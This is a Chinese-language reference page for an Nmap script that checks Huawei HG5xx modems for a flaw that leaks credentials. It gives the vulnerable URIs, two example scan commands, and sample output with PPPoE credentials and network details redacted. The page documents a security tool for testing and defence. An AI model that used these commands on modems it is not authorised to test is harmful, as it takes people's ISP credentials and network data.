Nmap Script指令摘要
此指令用於檢測華為(Huawei)數據機型號HG530x、HG520x、HG510x(可能還有其他型號)是否存在遠端認證和資訊洩露漏洞;它還提取PPPoE憑證和其他有趣的設定值。
攻擊者可以查詢URI "/Listadeparametros.html" 和 "/wanfun.js" 以提取敏感資訊,包括PPPoE憑證、韌體版本、型號、閘道器、DNS伺服器和作用中的連接等資料。
這個指令利用了兩個漏洞,其中一個漏洞由墨西哥地下社群的 Adiaz (http://underground.org.mx) 發現並報告,它允許攻擊者提取PPPoE密碼;另一個設定洩露漏洞由Pedro Joaquin(http://hakim.ws)發現。
參考資料:
Nmap Script指令參數
slaxml.debug
slaxml 函式庫關乎除錯訊息的參數設定,請參閱slaxml函式庫以獲得更多詳細資訊
http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent
請參閱 http函式庫進一步了解相關設定和參數。
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
請參閱 smbauth函式庫以獲得更多詳細資訊;這些參數和設定用於 SMB 身份驗證,是一種用於存取 Windows 網路共享的協議,以下是對這些參數的簡要說明:
smbdomain: SMB 身份驗證的網域名稱或工作組名稱。
smbhash:用於身份驗證的 SMB 雜湊值 (Harsh Value)。
smbnoguest:指出是否禁用 SMB 中的訪客帳號。
smbpassword:用於 SMB 身份驗證的使用者密碼。
smbtype:指定 SMB 身份驗證的類型。
smbusername: SMB 身份驗證的使用者名稱。
vulns.short, vulns.showall
請參閱 vulns函式庫獲得更多詳細資訊;這些參數用於檢測和報告漏洞和安全問題,以下是對這些參數的簡要說明:
vulns.short:用於控制漏洞報告的簡短格式;如果設置為 true,漏洞報告可能以簡短的方式呈現,通常包括基本訊息,可用於快速查看漏洞摘要。
vulns.showall:用於控制是否顯示所有漏洞報告;如果設置為 true,則漏洞報告將包括所有可用的詳細資訊,以提供更全面的漏洞報告,用於深入研究漏洞的細節。
Nmap Script指令範例
nmap -p80 --script http-huawei-hg5xx-vuln <target>
nmap -sV http-huawei-hg5xx-vuln <target>
Nmap Script指令輸出
PORT STATE SERVICE VERSION
80/tcp open http Huawei aDSL modem EchoLife HG530 (V100R001B122gTelmex) 4.07 -- UPnP/1.0 (ZyXEL ZyWALL 2)
| http-huawei-hg5xx-vuln:
| VULNERABLE:
| Remote credential and information disclosure in modems Huawei HG5XX
| State: VULNERABLE (Exploitable)
| Description:
| Modems Huawei 530x, 520x and possibly others are vulnerable to remote credential and information disclosure.
| Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information
| including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values
| Disclosure date: 2011-01-1
| Extra information:
|
| Model:EchoLife HG530
| Firmware version:V100R001B122gTelmex
| External IP:xxx.xxx.xx.xxx
| Gateway IP:xxx.xx.xxx.xxx
| DNS 1:200.33.146.249
| DNS 2:200.33.146.241
| Network segment:192.168.1.0
| Active ethernet connections:0
| Active wireless connections:3
| BSSID:0xdeadbeefcafe
| Wireless Encryption (Boolean):1
| PPPoE username:xxx
| PPPoE password:xxx
| References:
| http://routerpwn.com/#huawei
|_ http://websec.ca/advisories/view/Huawei-HG520c-3.10.18.x-information-disclosure
Nmap Script作者:
Paulino Calderon
License: Same as Nmap--See https://nmap.org/book/man-legal.html